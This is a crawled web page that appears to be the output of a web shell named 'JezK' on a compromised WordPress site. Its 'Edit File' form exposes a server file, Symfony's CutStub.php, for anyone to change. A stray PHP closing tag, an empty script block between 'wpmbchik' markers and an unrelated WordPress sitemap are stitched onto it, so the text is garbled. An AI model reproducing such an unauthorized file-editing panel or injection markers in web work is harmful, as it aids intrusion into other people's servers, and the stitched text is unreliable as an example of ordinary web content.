
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: CutStub.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php

/*
 * This file is part of the Symfony package.
 *
 * (c) Fabien Potencier &lt;fabien@symfony.com&gt;
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Symfony\Component\VarDumper\Caster;

use Symfony\Component\VarDumper\Cloner\Stub;

/**
 * Represents the main properties of a PHP variable, pre-casted by a caster.
 *
 * @author Nicolas Grekas &lt;p@tchwork.com&gt;
 */
class CutStub extends Stub
{
    public function __construct(mixed $value)
    {
        $this-&gt;value = $value;

        switch (\gettype($value)) {
            case 'object':
                $this-&gt;type = self::TYPE_OBJECT;
                $this-&gt;class = get_debug_type($value);

                if ($value instanceof \Closure) {
                    ReflectionCaster::castClosure($value, [], $this, true, Caster::EXCLUDE_VERBOSE);
                }

                $this-&gt;cut = -1;
                break;

            case 'array':
                $this-&gt;type = self::TYPE_ARRAY;
                $this-&gt;class = self::ARRAY_ASSOC;
                $this-&gt;cut = $this-&gt;value = \count($value);
                break;

            case 'resource':
            case 'unknown type':
            case 'resource (closed)':
                $this-&gt;type = self::TYPE_RESOURCE;
                $this-&gt;handle = (int) $value;
                if ('Unknown' === $this-&gt;class = @get_resource_type($value)) {
                    $this-&gt;class = 'Closed';
                }
                $this-&gt;cut = -1;
                break;

            case 'string':
                $this-&gt;type = self::TYPE_STRING;
                $this-&gt;class = preg_match('//u', $value) ? self::STRING_UTF8 : self::STRING_BINARY;
                $this-&gt;cut = self::STRING_BINARY === $this-&gt;class ? \strlen($value) : mb_strlen($value, 'UTF-8');
                $this-&gt;value = '';
                break;
        }
    }
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

?>

<!-- wpmbchik -->

<script>

</script>
<!-- /wpmbchik -->
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://kalam-i-haqq.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://kalam-i-haqq.com/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://kalam-i-haqq.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://kalam-i-haqq.com/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://kalam-i-haqq.com/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
